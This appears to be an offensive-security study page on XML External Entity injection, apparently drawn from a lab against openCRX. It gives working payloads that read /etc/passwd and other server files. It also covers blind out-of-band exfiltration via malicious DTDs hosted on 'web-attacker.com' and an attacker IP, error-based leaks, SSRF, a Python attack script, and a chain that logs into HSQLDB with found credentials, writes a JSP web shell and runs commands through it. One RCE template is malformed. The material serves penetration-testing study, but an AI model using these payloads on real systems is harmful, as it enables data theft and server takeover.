XML External Entity (XXE) Injection

XML is designed to encode data in a way that’s easier for humans and machines to read. The layout of an XML document is somewhat similar to an HTML document, although there are differences in implementations.

An application that relies on data stored in the XML format will inevitably make use of an XML parser or processor. The application calls this component when XML data needs to be processed. XML processors can suffer from different types of vulnerabilities originating from malformed or malicious input data (Information Disclosure, Server-Side Request Forgery, Denial of Service, Remote Command Injection).

Theory

- XML Entities in DTDs

  • DTDs can declare XML entities in XML documents.

  • XML entities are data structures containing XML code referenced multiple times.

  • Three types of XML entities: internal, external (private and public), and parameter.

Internal Entities:

  • Locally defined

  • Format: <!ENTITY name "entity_value">

  • Example: <!ENTITY test "<entity-value>test value</entity-value>">

External Entities:

  • Used for referencing data not defined locally.

  • Private external entity format: <!ENTITY name SYSTEM "URI">

  • Example of private external entity: <!ENTITY hola SYSTEM "http://www.example.com/company.xml">

  • Public external entity format: <!ENTITY name PUBLIC "public_id" "URI">

  • Example of public external entity: <!ENTITY hola PUBLIC "-//W3C//TEXT companyinfo//EN" "http://www.example.com/companyinfo.xml">

Parameter Entities:

  • Exist only within DTDs.

  • Format: <!ENTITY % name SYSTEM "URI">

  • Example: <!ENTITY % course 'AWAE'>, <!ENTITY Title 'Offensive Security presents %course;' >

Unparsed External Entities:

  • XML entities can contain non-XML data.

  • Use NDATA declaration to prevent XML parser processing.

  • Format for public and private external entities: <!ENTITY name SYSTEM "URI" NDATA TYPE> or <!ENTITY name PUBLIC "public_id" "URI" NDATA TYPE>.

  • Allows access to binary content, useful in web application environments lacking I/O stream manipulation flexibility.

- XML External Entity (XXE) injection is an attack against XML parsers

  • Attacker forces the XML parser to process external entities.

  • Can lead to disclosure of confidential information.

  • Requires maliciously-crafted XML request with system identifiers pointing to sensitive data.

  • Can be used to exfiltrate data, including binary content.

  • Depending on the application's programming language and protocol wrappers, may lead to command injection.

  • In some languages like PHP, XXE can result in remote code execution.

- Finding the Attack Vector

  • Demonstrates XXE attack with examples.

  • XML parser replaces entity reference with entity's value.

  • Changing an internal entity to an external entity referencing a file on the server can lead to reading server files.

  • Vulnerable parsers load file contents and place them in the XML document.

  • XXE payload should be injected into a field displayed in the web application.

  • Suggested target: Accounts page with XML input, where XXE payloads can be used in text fields to observe attack results in the web application.

XXE to retrieve files or obatain data

To perform an XXE injection attack that retrieves an arbitrary file from the server's filesystem, you need to introduce (or edit) a DOCTYPE element that defines an external entity containing the path to the file, or edit a data value in the XML that is returned in the application's response, to make use of the defined external entity.

- No Defenses Applied from the App

Normal Request:

<?xml version="1.0" encoding="UTF-8"?>
<stockCheck><productId>381</productId></stockCheck>

Payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>

- XInclude to retrieve files

Some applications receive client-submitted data, embed it on the server-side into an XML document, and then parse the document. In this situation, we cannot carry out a classic XXE attack, because you don't control the entire XML document and so cannot define or modify a DOCTYPE element. However, you might be able to use XInclude instead. XInclude is a part of the XML specification that allows an XML document to be built from sub-documents. You can place an XInclude attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document.

To perform an XInclude attack, you need to reference the XInclude namespace and provide the path to the file that you wish to include. For example:

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>

- XXE attacks via modified content type

Most POST requests use a default content type that is generated by HTML forms, such as application/x-www-form-urlencoded. Some web sites expect to receive requests in this format but will tolerate other content types, including XML.

For example, if a normal request contains the following:

POST /action HTTP/1.0
Content-Type: application/x-www-form-urlencoded
…………………
foo=bar

Then you might be able submit the following request, with the same result:

POST /action HTTP/1.0
Content-Type: text/xml
…………………
<?xml version="1.0" encoding="UTF-8"?><foo>bar</foo>

If the application tolerates requests containing XML in the message body, and parses the body content as XML, then you can reach the hidden XXE attack.

- XXE via image file upload

Create a local SVG image with the following content:

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>

Upload that image, then, when you view your comment/avatar/image, you should see the contents of the /etc/hostname file in your image.

- Blind XXE with out-of-band (OOB) interaction

First, the declaration of an XML parameter entity includes the percent character before the entity name:

<!DOCTYPE foo [ <!ENTITY % myparameterentity "my parameter entity value" > ]>

And second, parameter entities are referenced using the percent character instead of the usual ampersand:

%myparameterentity;

If you try this and others xml injections and doesn't work we should try an XXE OOB charging an external URL (Burp Collaborator, Ngrok, …):

<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://web-attacker.com"> %xxe; ]>

If nothing is shown but we receive a hit in the server, then it is a Blind XXE with out-of-band (OOB) interaction.

Now from here, for example, we can upload a malicious dtd from the subdomain server.

- Blind XXE to exfiltrate data using a malicious external DTD

First, we create a malicious DTD:

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://web-attacker.com/?file=%file;'>">
%eval;
%exfil;

Then, we put the url direction to the server where we have the malicious dtd:

<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://web-attacker.com/malicious.dtd"> %xxe; ]>

Then we have to base64 decode the info:

echo "{blow received}" | base64 -d; echo

- Blind XXE to retrieve data via error messages

An alternative approach to exploiting blind XXE is to trigger an XML parsing error where the error message contains the sensitive data that you wish to retrieve.

You can trigger an XML parsing error message containing the contents of the /etc/passwd file using a malicious external DTD as follows:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

Then we should invoke it like in Blind XXE with out-of-band (OOB) interaction, this will result in an error message revealing the target file.

- Blind XXE by repurposing a local DTD

Out-of-band connections are blocked, so this attack involves invoking a DTD file that happens to exist on the local filesystem and repurposing it to redefine an existing entity in a way that triggers a parsing error containing sensitive data.

First, we have to locate an existing DTD file to repurpose. We can test common DTD files to locate a file that is present, to locate it:

<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
%local_dtd;
]>

Then, we need to obtain a copy of the file and review it to find an entity that we can redefine. Since many common systems that include DTD files are open source, you can normally quickly obtain a copy of files through internet search.

For example, suppose there is a DTD file on the server filesystem at the location /usr/local/app/schema.dtd, and this DTD file defines an entity called custom_entity. An attacker can trigger an XML parsing error message containing the contents of the /etc/passwd file by submitting a hybrid DTD like the following:

<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/local/app/schema.dtd">
<!ENTITY % custom_entity '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>

Information Disclosure

- File Reading

Use a POST request to /account with "application/xml" as the request body format.

Inspect sample objects in the model and find a simple example to use in the POST body.

Modify the POST request to include a simple DOCTYPE and ENTITY for testing.

<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY lastname "Replaced">
]>
<org.opencrx.kernel.account1.Contact>
<lastName>&lastname;</lastName>
<firstName>Tom</firstName>
</org.opencrx.kernel.account1.Contact>

Once we notice internal entities are being parsed successfully, we will attempt to use an external entity to reference a file on the server:

<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY lastname SYSTEM "file:///etc/passwd">
]>
<org.opencrx.kernel.account1.Contact>
<lastName>&lastname;</lastName>
<firstName>Tom</firstName>
</org.opencrx.kernel.account1.Contact>

- Enumerate contents of directories

<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY directory SYSTEM "file:///etc/">
]>
<org.opencrx.kernel.account1.Contact>
<lastName>&directory;</lastName>
<firstName>Tom</firstName>
</org.opencrx.kernel.account1.Contact>

- Enumerate the whole server's file system through recursive XXE attack

<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY % file SYSTEM "file:///">
<!ENTITY % recursive "<!ENTITY &#37; allfiles SYSTEM 'file:///%file%;'>
%allfiles;
">
%recursive;
]>
<org.opencrx.kernel.account1.Contact>
<lastName>&allfiles;</lastName>
<firstName>Tom</firstName>
</org.opencrx.kernel.account1.Contact>

- Script to cleanly display XXE attack results

import requests
import xml.etree.ElementTree as ET
import xml.dom.minidom as minidom

# Replace with the URL of the vulnerable API endpoint
url = "http://example.com/vulnerable_api_endpoint"

# Define the XXE payload
xxe_payload = """
<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY lastname SYSTEM "file:///etc/passwd">
]>
<org.opencrx.kernel.account1.Contact>
<lastName>&lastname;</lastName>
<firstName>Tom</firstName>
</org.opencrx.kernel.account1.Contact>
"""

# Send the XXE payload as a POST request
response = requests.post(url, data=xxe_payload, headers={"Content-Type": "application/xml"})

# Check if the request was successful
if response.status_code == 200:
    # Parse the XML response
    root = ET.fromstring(response.text)

    # Pretty-print the XML response
    xml_str = ET.tostring(root, encoding="utf-8").decode("utf-8")
    pretty_xml = minidom.parseString(xml_str).toprettyxml()

    # Print the human-readable XML
    print(pretty_xml)

else:
    print("XXE Attack Failed")

- File Reading using CDATA Sections

Directly reading files via XXE can cause parser errors if the file contains XML-specific characters like "<" and ">".

The solution are CDATA Sections: XML's CDATA sections are used to ensure the parser treats file contents as text, not markup. CDATA sections start with <![CDATA[ and end with ]]>.

First, create a malicious DTD in the attacker server:

sudo cat /var/www/html/wrapper.dtd

<!ENTITY wrapper "%start;%file;%end;">

Now, update the payload to reference this DTD:

<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % start "<![CDATA[">
<!ENTITY % file SYSTEM "file:///home/student/crx/apache-tomee-plus7.0.5/conf/tomcat-users.xml" >
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://192.168.119.120/wrapper.dtd"
> %dtd;
]>
# This is the original safe request, the payload goes below it:
<org.opencrx.kernel.account1.Contact>
	<lastName>&wrapper;</lastName>
	<firstName>Tom</firstName>
</org.opencrx.kernel.account1.Contact>

- Enumerate contents of directories using CDATA Sections

<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % start "<![CDATA[">
<!ENTITY % file SYSTEM "file:///home/student/crx/" >
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://192.168.119.120/wrapper.dtd"
> %dtd;
]>

XXE to perform SSRF attacks

In this XXE+SSRF Attack once you discover trough SSRF Attack internal ports or internal Ips, you start the XXE attack:

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal.vulnerable-website.com/"> ]>

XXE to RCE

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
 
]>
<root>
 <name>John</name>
 <tel>test</tel>
 <email>START__END</email>
 <password>test</password>
</root>

- Tomcat and openCRX RCE through XXE and HSQLDB database access

First, XXE was exploited to read tomcat-users.xml for credentials but unable to leverage XXE for accessing Tomcat Manager due to role restrictions.

Using XXE we obtained directory listings, leading to the discovery of database-related files and credentials at /home/student/crx/data/hsqldb/.

Then, we found JDBC connection string in dbmanager.sh file, indicating use of HSQLDB. The credentials username: sa and password: manager99 are found.

To check database accessibility:

nmap -p 9001 [server IP]

To connect to HSQLDB:

java -cp hsqldb.jar org.hsqldb.util.DatabaseManagerSwing --url jdbc:hsqldb:hsql://opencrx:9001/CRX --user sa --password manager99

Once in the database, Java Language Routines (JRTs) were used in HSQLDB, which serve to call Java static methods:

CREATE FUNCTION systemprop(IN key VARCHAR) RETURNS VARCHAR LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME 'CLASSPATH:java.lang.System.getProperty'

Then, we will use the writeBytesToFilename method from com.sun.org.apache.xml.internal.security.utils.JavaUtils to write files to the server (convert payload to bytes using Burp Suite's Decoder tool):

CREATE PROCEDURE writeBytesToFilename(IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(1024)) LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME 'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'

Then, create a JSP web shell to execute commands on the server (default kali jsp webshell at /usr/share/webshells/jsp/cmdjsp.jsp):

call writeBytesToFilename('path/to/shell.jsp', cast ('[converted shell content]' AS VARBINARY(1024)))

call writeBytesToFilename(''../../apache-tomee-plus-7.0.5/apps/opencrx-coreCRX/opencrx-core-CRX/shell.jsp', cast ('[converted shell content]' AS VARBINARY(1024)))

Now, we can access the uploaded JSP shell via browser or curl:

curl http://opencrx:8080/path/to/shell.jsp?cmd=[command]

Last updated